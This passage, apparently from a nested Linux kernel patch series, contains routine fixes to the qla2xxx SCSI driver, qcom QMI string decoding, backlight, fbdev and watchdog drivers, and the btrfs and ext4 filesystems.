+ 	qp->fwres.exch_used += iores->exch_cnt;
++	if (ql2xenforce_iocb_limit == 2) {
++		atomic_add(iores->iocb_cnt, &ha->fwres.iocb_used);
++		atomic_add(iores->exch_cnt, &ha->fwres.exch_used);
++		iores->res_type |= RESOURCE_HA;
++	}
+ 	return 0;
+ }
+ 
++/*
++ * decrement to zero.  This routine will not decrement below zero
++ * @v:  pointer of type atomic_t
++ * @amount: amount to decrement from v
++ */
++static void qla_atomic_dtz(atomic_t *v, int amount)
++{
++	int c, old, dec;
++
++	c = atomic_read(v);
++	for (;;) {
++		dec = c - amount;
++		if (unlikely(dec < 0))
++			dec = 0;
++
++		old = atomic_cmpxchg((v), c, dec);
++		if (likely(old == c))
++			break;
++		c = old;
++	}
++}
++
+ static inline void
+ qla_put_fw_resources(struct qla_qpair *qp, struct iocb_resource *iores)
+ {
++	struct qla_hw_data *ha = qp->hw;
++
++	if (iores->res_type & RESOURCE_HA) {
++		if (iores->res_type & RESOURCE_IOCB)
++			qla_atomic_dtz(&ha->fwres.iocb_used, iores->iocb_cnt);
++
++		if (iores->res_type & RESOURCE_EXCH)
++			qla_atomic_dtz(&ha->fwres.exch_used, iores->exch_cnt);
++	}
++
+ 	if (iores->res_type & RESOURCE_IOCB) {
+ 		if (qp->fwres.iocbs_used >= iores->iocb_cnt) {
+ 			qp->fwres.iocbs_used -= iores->iocb_cnt;
+diff --git a/drivers/scsi/qla2xxx/qla_iocb.c b/drivers/scsi/qla2xxx/qla_iocb.c
+index c9a686f06d29d..9e524d52dc862 100644
+--- a/drivers/scsi/qla2xxx/qla_iocb.c
++++ b/drivers/scsi/qla2xxx/qla_iocb.c
+@@ -3887,6 +3887,7 @@ qla_marker_iocb(srb_t *sp, struct mrk_entry_24xx *mrk)
+ {
+ 	mrk->entry_type = MARKER_TYPE;
+ 	mrk->modifier = sp->u.iocb_cmd.u.tmf.modifier;
++	mrk->handle = make_handle(sp->qpair->req->id, sp->handle);
+ 	if (sp->u.iocb_cmd.u.tmf.modifier != MK_SYNC_ALL) {
+ 		mrk->nport_handle = cpu_to_le16(sp->u.iocb_cmd.u.tmf.loop_id);
+ 		int_to_scsilun(sp->u.iocb_cmd.u.tmf.lun, (struct scsi_lun *)&mrk->lun);
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index b41d604ca9bc8..0111249cc8774 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -1121,8 +1121,12 @@ qla2x00_async_event(scsi_qla_host_t *vha, struct rsp_que *rsp, uint16_t *mb)
+ 	unsigned long	flags;
+ 	fc_port_t	*fcport = NULL;
+ 
+-	if (!vha->hw->flags.fw_started)
++	if (!vha->hw->flags.fw_started) {
++		ql_log(ql_log_warn, vha, 0x50ff,
++		    "Dropping AEN - %04x %04x %04x %04x.\n",
++		    mb[0], mb[1], mb[2], mb[3]);
+ 		return;
++	}
+ 
+ 	/* Setup to process RIO completion. */
+ 	handle_cnt = 0;
+@@ -2539,7 +2543,6 @@ qla24xx_tm_iocb_entry(scsi_qla_host_t *vha, struct req_que *req, void *tsk)
+ 	case CS_PORT_BUSY:
+ 	case CS_INCOMPLETE:
+ 	case CS_PORT_UNAVAILABLE:
+-	case CS_TIMEOUT:
+ 	case CS_RESET:
+ 		if (atomic_read(&fcport->state) == FCS_ONLINE) {
+ 			ql_dbg(ql_dbg_disc, fcport->vha, 0x3021,
+diff --git a/drivers/scsi/qla2xxx/qla_mbx.c b/drivers/scsi/qla2xxx/qla_mbx.c
+index 359595a64664c..f794f4363a38c 100644
+--- a/drivers/scsi/qla2xxx/qla_mbx.c
++++ b/drivers/scsi/qla2xxx/qla_mbx.c
+@@ -273,7 +273,6 @@ qla2x00_mailbox_command(scsi_qla_host_t *vha, mbx_cmd_t *mcp)
+ 		spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 
+ 		wait_time = jiffies;
+-		atomic_inc(&ha->num_pend_mbx_stage3);
+ 		if (!wait_for_completion_timeout(&ha->mbx_intr_comp,
+ 		    mcp->tov * HZ)) {
+ 			ql_dbg(ql_dbg_mbx, vha, 0x117a,
+@@ -290,7 +289,6 @@ qla2x00_mailbox_command(scsi_qla_host_t *vha, mbx_cmd_t *mcp)
+ 				spin_unlock_irqrestore(&ha->hardware_lock,
+ 				    flags);
+ 				atomic_dec(&ha->num_pend_mbx_stage2);
+-				atomic_dec(&ha->num_pend_mbx_stage3);
+ 				rval = QLA_ABORTED;
+ 				goto premature_exit;
+ 			}
+@@ -302,11 +300,9 @@ qla2x00_mailbox_command(scsi_qla_host_t *vha, mbx_cmd_t *mcp)
+ 			ha->flags.mbox_busy = 0;
+ 			spin_unlock_irqrestore(&ha->hardware_lock, flags);
+ 			atomic_dec(&ha->num_pend_mbx_stage2);
+-			atomic_dec(&ha->num_pend_mbx_stage3);
+ 			rval = QLA_ABORTED;
+ 			goto premature_exit;
+ 		}
+-		atomic_dec(&ha->num_pend_mbx_stage3);
+ 
+ 		if (time_after(jiffies, wait_time + 5 * HZ))
+ 			ql_log(ql_log_warn, vha, 0x1015, "cmd=0x%x, waited %d msecs\n",
+@@ -2213,6 +2209,9 @@ qla2x00_get_firmware_state(scsi_qla_host_t *vha, uint16_t *states)
+ 	ql_dbg(ql_dbg_mbx + ql_dbg_verbose, vha, 0x1054,
+ 	    "Entered %s.\n", __func__);
+ 
++	if (!ha->flags.fw_started)
++		return QLA_FUNCTION_FAILED;
++
+ 	mcp->mb[0] = MBC_GET_FIRMWARE_STATE;
+ 	mcp->out_mb = MBX_0;
+ 	if (IS_FWI2_CAPABLE(vha->hw))
+diff --git a/drivers/scsi/qla2xxx/qla_nvme.c b/drivers/scsi/qla2xxx/qla_nvme.c
+index 57545d5e82b9d..c9a6fc882a801 100644
+--- a/drivers/scsi/qla2xxx/qla_nvme.c
++++ b/drivers/scsi/qla2xxx/qla_nvme.c
+@@ -132,6 +132,7 @@ static int qla_nvme_alloc_queue(struct nvme_fc_local_port *lport,
+ 			       "Failed to allocate qpair\n");
+ 			return -EINVAL;
+ 		}
++		qla_adjust_iocb_limit(vha);
+ 	}
+ 	*handle = qpair;
+ 
+@@ -663,7 +664,7 @@ static int qla_nvme_post_cmd(struct nvme_fc_local_port *lport,
+ 
+ 	rval = qla2x00_start_nvme_mq(sp);
+ 	if (rval != QLA_SUCCESS) {
+-		ql_log(ql_log_warn, vha, 0x212d,
++		ql_dbg(ql_dbg_io + ql_dbg_verbose, vha, 0x212d,
+ 		    "qla2x00_start_nvme_mq failed = %d\n", rval);
+ 		sp->priv = NULL;
+ 		priv->sp = NULL;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index ed70eb8847864..78f7cd16967fa 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -44,10 +44,11 @@ module_param(ql2xfulldump_on_mpifail, int, S_IRUGO | S_IWUSR);
+ MODULE_PARM_DESC(ql2xfulldump_on_mpifail,
+ 		 "Set this to take full dump on MPI hang.");
+ 
+-int ql2xenforce_iocb_limit = 1;
++int ql2xenforce_iocb_limit = 2;
+ module_param(ql2xenforce_iocb_limit, int, S_IRUGO | S_IWUSR);
+ MODULE_PARM_DESC(ql2xenforce_iocb_limit,
+-		 "Enforce IOCB throttling, to avoid FW congestion. (default: 1)");
++		 "Enforce IOCB throttling, to avoid FW congestion. (default: 2) "
++		 "1: track usage per queue, 2: track usage per adapter");
+ 
+ /*
+  * CT6 CTX allocation cache
+@@ -1478,8 +1479,9 @@ qla2xxx_eh_device_reset(struct scsi_cmnd *cmd)
+ 		goto eh_reset_failed;
+ 	}
+ 	err = 3;
+-	if (qla2x00_eh_wait_for_pending_commands(vha, sdev->id,
+-	    sdev->lun, WAIT_LUN) != QLA_SUCCESS) {
++	if (qla2x00_eh_wait_for_pending_commands(vha, fcport->d_id.b24,
++						 cmd->device->lun,
++						 WAIT_LUN) != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x800d,
+ 		    "wait for pending cmds failed for cmd=%p.\n", cmd);
+ 		goto eh_reset_failed;
+@@ -1545,8 +1547,8 @@ qla2xxx_eh_target_reset(struct scsi_cmnd *cmd)
+ 		goto eh_reset_failed;
+ 	}
+ 	err = 3;
+-	if (qla2x00_eh_wait_for_pending_commands(vha, sdev->id,
+-	    0, WAIT_TARGET) != QLA_SUCCESS) {
++	if (qla2x00_eh_wait_for_pending_commands(vha, fcport->d_id.b24, 0,
++						 WAIT_TARGET) != QLA_SUCCESS) {
+ 		ql_log(ql_log_warn, vha, 0x800d,
+ 		    "wait for pending cmds failed for cmd=%p.\n", cmd);
+ 		goto eh_reset_failed;
+@@ -2999,9 +3001,10 @@ qla2x00_probe_one(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	ha->max_exchg = FW_MAX_EXCHANGES_CNT;
+ 	atomic_set(&ha->num_pend_mbx_stage1, 0);
+ 	atomic_set(&ha->num_pend_mbx_stage2, 0);
+-	atomic_set(&ha->num_pend_mbx_stage3, 0);
+ 	atomic_set(&ha->zio_threshold, DEFAULT_ZIO_THRESHOLD);
+ 	ha->last_zio_threshold = DEFAULT_ZIO_THRESHOLD;
++	INIT_LIST_HEAD(&ha->tmf_pending);
++	INIT_LIST_HEAD(&ha->tmf_active);
+ 
+ 	/* Assign ISP specific operations. */
+ 	if (IS_QLA2100(ha)) {
+@@ -3278,6 +3281,13 @@ qla2x00_probe_one(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	host->max_id = ha->max_fibre_devices;
+ 	host->cmd_per_lun = 3;
+ 	host->unique_id = host->host_no;
++
++	if (ql2xenabledif && ql2xenabledif != 2) {
++		ql_log(ql_log_warn, base_vha, 0x302d,
++		       "Invalid value for ql2xenabledif, resetting it to default (2)\n");
++		ql2xenabledif = 2;
++	}
++
+ 	if (IS_T10_PI_CAPABLE(ha) && ql2xenabledif)
+ 		host->max_cmd_len = 32;
+ 	else
+@@ -3515,8 +3525,6 @@ skip_dpc:
+ 			base_vha->flags.difdix_supported = 1;
+ 			ql_dbg(ql_dbg_init, base_vha, 0x00f1,
+ 			    "Registering for DIF/DIX type 1 and 3 protection.\n");
+-			if (ql2xenabledif == 1)
+-				prot = SHOST_DIX_TYPE0_PROTECTION;
+ 			if (ql2xprotmask)
+ 				scsi_host_set_prot(host, ql2xprotmask);
+ 			else
+diff --git a/drivers/scsi/qla2xxx/qla_target.c b/drivers/scsi/qla2xxx/qla_target.c
+index bb754a9508023..545473a0ffc84 100644
+--- a/drivers/scsi/qla2xxx/qla_target.c
++++ b/drivers/scsi/qla2xxx/qla_target.c
+@@ -1085,10 +1085,6 @@ void qlt_free_session_done(struct work_struct *work)
+ 			(struct imm_ntfy_from_isp *)sess->iocb, SRB_NACK_LOGO);
+ 	}
+ 
+-	spin_lock_irqsave(&vha->work_lock, flags);
+-	sess->flags &= ~FCF_ASYNC_SENT;
+-	spin_unlock_irqrestore(&vha->work_lock, flags);
+-
+ 	spin_lock_irqsave(&ha->tgt.sess_lock, flags);
+ 	if (sess->se_sess) {
+ 		sess->se_sess = NULL;
+@@ -1098,7 +1094,6 @@ void qlt_free_session_done(struct work_struct *work)
+ 
+ 	qla2x00_set_fcport_disc_state(sess, DSC_DELETED);
+ 	sess->fw_login_state = DSC_LS_PORT_UNAVAIL;
+-	sess->deleted = QLA_SESS_DELETED;
+ 
+ 	if (sess->login_succ && !IS_SW_RESV_ADDR(sess->d_id)) {
+ 		vha->fcport_count--;
+@@ -1150,10 +1145,15 @@ void qlt_free_session_done(struct work_struct *work)
+ 
+ 	sess->explicit_logout = 0;
+ 	spin_unlock_irqrestore(&ha->tgt.sess_lock, flags);
+-	sess->free_pending = 0;
+ 
+ 	qla2x00_dfs_remove_rport(vha, sess);
+ 
++	spin_lock_irqsave(&vha->work_lock, flags);
++	sess->flags &= ~FCF_ASYNC_SENT;
++	sess->deleted = QLA_SESS_DELETED;
++	sess->free_pending = 0;
++	spin_unlock_irqrestore(&vha->work_lock, flags);
++
+ 	ql_dbg(ql_dbg_disc, vha, 0xf001,
+ 	    "Unregistration of sess %p %8phC finished fcp_cnt %d\n",
+ 		sess, sess->port_name, vha->fcport_count);
+@@ -1202,12 +1202,12 @@ void qlt_unreg_sess(struct fc_port *sess)
+ 	 * management from being sent.
+ 	 */
+ 	sess->flags |= FCF_ASYNC_SENT;
++	sess->deleted = QLA_SESS_DELETION_IN_PROGRESS;
+ 	spin_unlock_irqrestore(&sess->vha->work_lock, flags);
+ 
+ 	if (sess->se_sess)
+ 		vha->hw->tgt.tgt_ops->clear_nacl_from_fcport_map(sess);
+ 
+-	sess->deleted = QLA_SESS_DELETION_IN_PROGRESS;
+ 	qla2x00_set_fcport_disc_state(sess, DSC_DELETE_PEND);
+ 	sess->last_rscn_gen = sess->rscn_gen;
+ 	sess->last_login_gen = sess->login_gen;
+diff --git a/drivers/soc/qcom/qmi_encdec.c b/drivers/soc/qcom/qmi_encdec.c
+index b7158e3c3a0bd..5c7161b18b724 100644
+--- a/drivers/soc/qcom/qmi_encdec.c
++++ b/drivers/soc/qcom/qmi_encdec.c
+@@ -534,8 +534,8 @@ static int qmi_decode_string_elem(const struct qmi_elem_info *ei_array,
+ 		decoded_bytes += rc;
+ 	}
+ 
+-	if (string_len > temp_ei->elem_len) {
+-		pr_err("%s: String len %d > Max Len %d\n",
++	if (string_len >= temp_ei->elem_len) {
++		pr_err("%s: String len %d >= Max Len %d\n",
+ 		       __func__, string_len, temp_ei->elem_len);
+ 		return -ETOOSMALL;
+ 	} else if (string_len > tlv_len) {
+diff --git a/drivers/video/backlight/gpio_backlight.c b/drivers/video/backlight/gpio_backlight.c
+index 5c5c99f7979e3..30ec5b6845335 100644
+--- a/drivers/video/backlight/gpio_backlight.c
++++ b/drivers/video/backlight/gpio_backlight.c
+@@ -87,8 +87,7 @@ static int gpio_backlight_probe(struct platform_device *pdev)
+ 		/* Not booted with device tree or no phandle link to the node */
+ 		bl->props.power = def_value ? FB_BLANK_UNBLANK
+ 					    : FB_BLANK_POWERDOWN;
+-	else if (gpiod_get_direction(gbl->gpiod) == 0 &&
+-		 gpiod_get_value_cansleep(gbl->gpiod) == 0)
++	else if (gpiod_get_value_cansleep(gbl->gpiod) == 0)
+ 		bl->props.power = FB_BLANK_POWERDOWN;
+ 	else
+ 		bl->props.power = FB_BLANK_UNBLANK;
+diff --git a/drivers/video/fbdev/ep93xx-fb.c b/drivers/video/fbdev/ep93xx-fb.c
+index 305f1587bd898..8b2bc4adc50f7 100644
+--- a/drivers/video/fbdev/ep93xx-fb.c
++++ b/drivers/video/fbdev/ep93xx-fb.c
+@@ -474,7 +474,6 @@ static int ep93xxfb_probe(struct platform_device *pdev)
+ 	if (!info)
+ 		return -ENOMEM;
+ 
+-	info->dev = &pdev->dev;
+ 	platform_set_drvdata(pdev, info);
+ 	fbi = info->par;
+ 	fbi->mach_info = mach_info;
+diff --git a/drivers/watchdog/intel-mid_wdt.c b/drivers/watchdog/intel-mid_wdt.c
+index 9b2173f765c8c..fb7fae750181b 100644
+--- a/drivers/watchdog/intel-mid_wdt.c
++++ b/drivers/watchdog/intel-mid_wdt.c
+@@ -203,3 +203,4 @@ module_platform_driver(mid_wdt_driver);
+ MODULE_AUTHOR("David Cohen <david.a.cohen@linux.intel.com>");
+ MODULE_DESCRIPTION("Watchdog Driver for Intel MID platform");
+ MODULE_LICENSE("GPL");
++MODULE_ALIAS("platform:intel_mid_wdt");
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 96369c44863a1..64daae693afd1 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -2721,11 +2721,10 @@ int btrfs_validate_super(struct btrfs_fs_info *fs_info,
+ 		ret = -EINVAL;
+ 	}
+ 
+-	if (memcmp(fs_info->fs_devices->fsid, fs_info->super_copy->fsid,
+-		   BTRFS_FSID_SIZE)) {
++	if (memcmp(fs_info->fs_devices->fsid, sb->fsid, BTRFS_FSID_SIZE) != 0) {
+ 		btrfs_err(fs_info,
+ 		"superblock fsid doesn't match fsid of fs_devices: %pU != %pU",
+-			fs_info->super_copy->fsid, fs_info->fs_devices->fsid);
++			  sb->fsid, fs_info->fs_devices->fsid);
+ 		ret = -EINVAL;
+ 	}
+ 
+diff --git a/fs/btrfs/extent-tree.c b/fs/btrfs/extent-tree.c
+index f2ee70c03f0d5..0640ef59fe660 100644
+--- a/fs/btrfs/extent-tree.c
++++ b/fs/btrfs/extent-tree.c
+@@ -3810,7 +3810,8 @@ static int do_allocation_zoned(struct btrfs_block_group *block_group,
+ 	       fs_info->data_reloc_bg == 0);
+ 
+ 	if (block_group->ro ||
+-	    test_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags)) {
++	    (!ffe_ctl->for_data_reloc &&
++	     test_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags))) {
+ 		ret = 1;
+ 		goto out;
+ 	}
+@@ -3853,8 +3854,26 @@ static int do_allocation_zoned(struct btrfs_block_group *block_group,
+ 	if (ffe_ctl->for_treelog && !fs_info->treelog_bg)
+ 		fs_info->treelog_bg = block_group->start;
+ 
+-	if (ffe_ctl->for_data_reloc && !fs_info->data_reloc_bg)
+-		fs_info->data_reloc_bg = block_group->start;
++	if (ffe_ctl->for_data_reloc) {
++		if (!fs_info->data_reloc_bg)
++			fs_info->data_reloc_bg = block_group->start;
++		/*
++		 * Do not allow allocations from this block group, unless it is
++		 * for data relocation. Compared to increasing the ->ro, setting
++		 * the ->zoned_data_reloc_ongoing flag still allows nocow
++		 * writers to come in. See btrfs_inc_nocow_writers().
++		 *
++		 * We need to disable an allocation to avoid an allocation of
++		 * regular (non-relocation data) extent. With mix of relocation
++		 * extents and regular extents, we can dispatch WRITE commands
++		 * (for relocation extents) and ZONE APPEND commands (for
++		 * regular extents) at the same time to the same zone, which
++		 * easily break the write pointer.
++		 *
++		 * Also, this flag avoids this block group to be zone finished.
++		 */
++		set_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags);
++	}
+ 
+ 	ffe_ctl->found_offset = start + block_group->alloc_offset;
+ 	block_group->alloc_offset += num_bytes;
+@@ -3872,24 +3891,8 @@ static int do_allocation_zoned(struct btrfs_block_group *block_group,
+ out:
+ 	if (ret && ffe_ctl->for_treelog)
+ 		fs_info->treelog_bg = 0;
+-	if (ret && ffe_ctl->for_data_reloc &&
+-	    fs_info->data_reloc_bg == block_group->start) {
+-		/*
+-		 * Do not allow further allocations from this block group.
+-		 * Compared to increasing the ->ro, setting the
+-		 * ->zoned_data_reloc_ongoing flag still allows nocow
+-		 *  writers to come in. See btrfs_inc_nocow_writers().
+-		 *
+-		 * We need to disable an allocation to avoid an allocation of
+-		 * regular (non-relocation data) extent. With mix of relocation
+-		 * extents and regular extents, we can dispatch WRITE commands
+-		 * (for relocation extents) and ZONE APPEND commands (for
+-		 * regular extents) at the same time to the same zone, which
+-		 * easily break the write pointer.
+-		 */
+-		set_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags);
++	if (ret && ffe_ctl->for_data_reloc)
+ 		fs_info->data_reloc_bg = 0;
+-	}
+ 	spin_unlock(&fs_info->relocation_bg_lock);
+ 	spin_unlock(&fs_info->treelog_bg_lock);
+ 	spin_unlock(&block_group->lock);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 28bcba2e05908..222068bf80031 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -3393,6 +3393,13 @@ out:
+ 			btrfs_free_reserved_extent(fs_info,
+ 					ordered_extent->disk_bytenr,
+ 					ordered_extent->disk_num_bytes, 1);
++			/*
++			 * Actually free the qgroup rsv which was released when
++			 * the ordered extent was created.
++			 */
++			btrfs_qgroup_free_refroot(fs_info, inode->root->root_key.objectid,
++						  ordered_extent->qgroup_rsv,
++						  BTRFS_QGROUP_RSV_DATA);
+ 		}
+ 	}
+ 
+diff --git a/fs/btrfs/relocation.c b/fs/btrfs/relocation.c
+index d3591c7f166ad..d2bdcc2cce498 100644
+--- a/fs/btrfs/relocation.c
++++ b/fs/btrfs/relocation.c
+@@ -2985,9 +2985,6 @@ static int relocate_one_page(struct inode *inode, struct file_ra_state *ra,
+ 		if (!page)
+ 			return -ENOMEM;
+ 	}
+-	ret = set_page_extent_mapped(page);
+-	if (ret < 0)
+-		goto release_page;
+ 
+ 	if (PageReadahead(page))
+ 		page_cache_async_readahead(inode->i_mapping, ra, NULL,
+@@ -3003,6 +3000,15 @@ static int relocate_one_page(struct inode *inode, struct file_ra_state *ra,
+ 		}
+ 	}
+ 
++	/*
++	 * We could have lost page private when we dropped the lock to read the
++	 * page above, make sure we set_page_extent_mapped here so we have any
++	 * of the subpage blocksize stuff we need in place.
++	 */
++	ret = set_page_extent_mapped(page);
++	if (ret < 0)
++		goto release_page;
++
+ 	page_start = page_offset(page);
+ 	page_end = page_start + PAGE_SIZE - 1;
+ 
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index c7642c00a65d0..2635fb4bffa06 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -404,11 +404,7 @@ int btrfs_can_overcommit(struct btrfs_fs_info *fs_info,
+ 		return 0;
+ 
+ 	used = btrfs_space_info_used(space_info, true);
+-	if (test_bit(BTRFS_FS_ACTIVE_ZONE_TRACKING, &fs_info->flags) &&
+-	    (space_info->flags & BTRFS_BLOCK_GROUP_METADATA))
+-		avail = 0;
+-	else
+-		avail = calc_available_free_space(fs_info, space_info, flush);
++	avail = calc_available_free_space(fs_info, space_info, flush);
+ 
+ 	if (used + bytes < writable_total_bytes(fs_info, space_info) + avail)
+ 		return 1;
+diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
+index 2b776fce1c0ff..a555567594418 100644
+--- a/fs/btrfs/transaction.c
++++ b/fs/btrfs/transaction.c
+@@ -279,10 +279,11 @@ loop:
+ 	spin_unlock(&fs_info->trans_lock);
+ 
+ 	/*
+-	 * If we are ATTACH, we just want to catch the current transaction,
+-	 * and commit it. If there is no transaction, just return ENOENT.
++	 * If we are ATTACH or TRANS_JOIN_NOSTART, we just want to catch the
++	 * current transaction, and commit it. If there is no transaction, just
++	 * return ENOENT.
+ 	 */
+-	if (type == TRANS_ATTACH)
++	if (type == TRANS_ATTACH || type == TRANS_JOIN_NOSTART)
+ 		return -ENOENT;
+ 
+ 	/*
+@@ -580,8 +581,13 @@ start_transaction(struct btrfs_root *root, unsigned int num_items,
+ 		u64 delayed_refs_bytes = 0;
+ 
+ 		qgroup_reserved = num_items * fs_info->nodesize;
+-		ret = btrfs_qgroup_reserve_meta_pertrans(root, qgroup_reserved,
+-				enforce_qgroups);
++		/*
++		 * Use prealloc for now, as there might be a currently running
++		 * transaction that could free this reserved space prematurely
++		 * by committing.
++		 */
++		ret = btrfs_qgroup_reserve_meta_prealloc(root, qgroup_reserved,
++							 enforce_qgroups, false);
+ 		if (ret)
+ 			return ERR_PTR(ret);
+ 
+@@ -693,6 +699,14 @@ again:
+ 		h->reloc_reserved = reloc_reserved;
+ 	}
+ 
++	/*
++	 * Now that we have found a transaction to be a part of, convert the
++	 * qgroup reservation from prealloc to pertrans. A different transaction
++	 * can't race in and free our pertrans out from under us.
++	 */
++	if (qgroup_reserved)
++		btrfs_qgroup_convert_reserved_meta(root, qgroup_reserved);
++
+ got_it:
+ 	if (!current->journal_info)
+ 		current->journal_info = h;
+@@ -740,7 +754,7 @@ alloc_fail:
+ 		btrfs_block_rsv_release(fs_info, &fs_info->trans_block_rsv,
+ 					num_bytes, NULL);
+ reserve_fail:
+-	btrfs_qgroup_free_meta_pertrans(root, qgroup_reserved);
++	btrfs_qgroup_free_meta_prealloc(root, qgroup_reserved);
+ 	return ERR_PTR(ret);
+ }
+ 
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index 9bc7ac06c5177..675dbed075d8e 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -2009,6 +2009,10 @@ static int do_zone_finish(struct btrfs_block_group *block_group, bool fully_writ
+ 	 * and block_group->meta_write_pointer for metadata.
+ 	 */
+ 	if (!fully_written) {
++		if (test_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags)) {
++			spin_unlock(&block_group->lock);
++			return -EAGAIN;
++		}
+ 		spin_unlock(&block_group->lock);
+ 
+ 		ret = btrfs_inc_block_group_ro(block_group, false);
+@@ -2037,7 +2041,9 @@ static int do_zone_finish(struct btrfs_block_group *block_group, bool fully_writ
+ 			return 0;
+ 		}
+ 
+-		if (block_group->reserved) {
++		if (block_group->reserved ||
++		    test_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC,
++			     &block_group->runtime_flags)) {
+ 			spin_unlock(&block_group->lock);
+ 			btrfs_dec_block_group_ro(block_group);
+ 			return -EAGAIN;
+@@ -2268,7 +2274,10 @@ void btrfs_zoned_release_data_reloc_bg(struct btrfs_fs_info *fs_info, u64 logica
+ 
+ 	/* All relocation extents are written. */
+ 	if (block_group->start + block_group->alloc_offset == logical + length) {
+-		/* Now, release this block group for further allocations. */
++		/*
++		 * Now, release this block group for further allocations and
++		 * zone finish.
++		 */
+ 		clear_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC,
+ 			  &block_group->runtime_flags);
+ 	}
+@@ -2292,7 +2301,8 @@ int btrfs_zone_finish_one_bg(struct btrfs_fs_info *fs_info)
+ 
+ 		spin_lock(&block_group->lock);
+ 		if (block_group->reserved || block_group->alloc_offset == 0 ||
+-		    (block_group->flags & BTRFS_BLOCK_GROUP_SYSTEM)) {
++		    (block_group->flags & BTRFS_BLOCK_GROUP_SYSTEM) ||
++		    test_bit(BLOCK_GROUP_FLAG_ZONED_DATA_RELOC, &block_group->runtime_flags)) {
+ 			spin_unlock(&block_group->lock);
+ 			continue;
+ 		}
+diff --git a/fs/ext4/balloc.c b/fs/ext4/balloc.c
+index 8e83b51e3c68a..fbd0329cf254e 100644
+--- a/fs/ext4/balloc.c
++++ b/fs/ext4/balloc.c
+@@ -910,11 +910,11 @@ unsigned long ext4_bg_num_gdb(struct super_block *sb, ext4_group_t group)
+ }
+ 
+ /*
+- * This function returns the number of file system metadata clusters at
++ * This function returns the number of file system metadata blocks at
+  * the beginning of a block group, including the reserved gdt blocks.
+  */
+-static unsigned ext4_num_base_meta_clusters(struct super_block *sb,
+-				     ext4_group_t block_group)
++unsigned int ext4_num_base_meta_blocks(struct super_block *sb,
++				       ext4_group_t block_group)
+ {
+ 	struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 	unsigned num;
+@@ -932,8 +932,15 @@ static unsigned ext4_num_base_meta_clusters(struct super_block *sb,
+ 	} else { /* For META_BG_BLOCK_GROUPS */
+ 		num += ext4_bg_num_gdb(sb, block_group);
+ 	}
+-	return EXT4_NUM_B2C(sbi, num);
++	return num;
+ }
++
++static unsigned int ext4_num_base_meta_clusters(struct super_block *sb,
++						ext4_group_t block_group)
++{
++	return EXT4_NUM_B2C(EXT4_SB(sb), ext4_num_base_meta_blocks(sb, block_group));
++}
++
+ /**
+  *	ext4_inode_to_goal_block - return a hint for block allocation
+  *	@inode: inode for block allocation
+diff --git a/fs/ext4/block_validity.c b/fs/ext4/block_validity.c
+index 5504f72bbbbe7..6fe3c941b5651 100644
+--- a/fs/ext4/block_validity.c
++++ b/fs/ext4/block_validity.c
+@@ -215,7 +215,6 @@ int ext4_setup_system_zone(struct super_block *sb)
+ 	struct ext4_system_blocks *system_blks;
+ 	struct ext4_group_desc *gdp;
+ 	ext4_group_t i;
+-	int flex_size = ext4_flex_bg_size(sbi);
+ 	int ret;
+ 
+ 	system_blks = kzalloc(sizeof(*system_blks), GFP_KERNEL);
+@@ -223,12 +222,13 @@ int ext4_setup_system_zone(struct super_block *sb)
+ 		return -ENOMEM;
+ 
+ 	for (i=0; i < ngroups; i++) {
++		unsigned int meta_blks = ext4_num_base_meta_blocks(sb, i);
++
+ 		cond_resched();
+-		if (ext4_bg_has_super(sb, i) &&
+-		    ((i < 5) || ((i % flex_size) == 0))) {
++		if (meta_blks != 0) {
+ 			ret = add_system_zone(system_blks,
+ 					ext4_group_first_block_no(sb, i),
+-					ext4_bg_num_gdb(sb, i) + 1, 0);
++					meta_blks, 0);
+ 			if (ret)
+ 				goto err;
+ 		}
+diff --git a/fs/ext4/crypto.c b/fs/ext4/crypto.c
+index e20ac0654b3f2..453d4da5de520 100644
+--- a/fs/ext4/crypto.c
++++ b/fs/ext4/crypto.c
+@@ -33,6 +33,8 @@ int ext4_fname_setup_filename(struct inode *dir, const struct qstr *iname,
+ 
+ #if IS_ENABLED(CONFIG_UNICODE)
+ 	err = ext4_fname_setup_ci_filename(dir, iname, fname);
++	if (err)
++		ext4_fname_free_filename(fname);
+ #endif
+ 	return err;
+ }
+@@ -51,6 +53,8 @@ int ext4_fname_prepare_lookup(struct inode *dir, struct dentry *dentry,
+ 
+ #if IS_ENABLED(CONFIG_UNICODE)
+ 	err = ext4_fname_setup_ci_filename(dir, &dentry->d_name, fname);
++	if (err)
++		ext4_fname_free_filename(fname);
+ #endif
+ 	return err;
+ }
+diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
+index 0ea3960cb83ee..72abb8d6caf75 100644
+--- a/fs/ext4/ext4.h
++++ b/fs/ext4/ext4.h
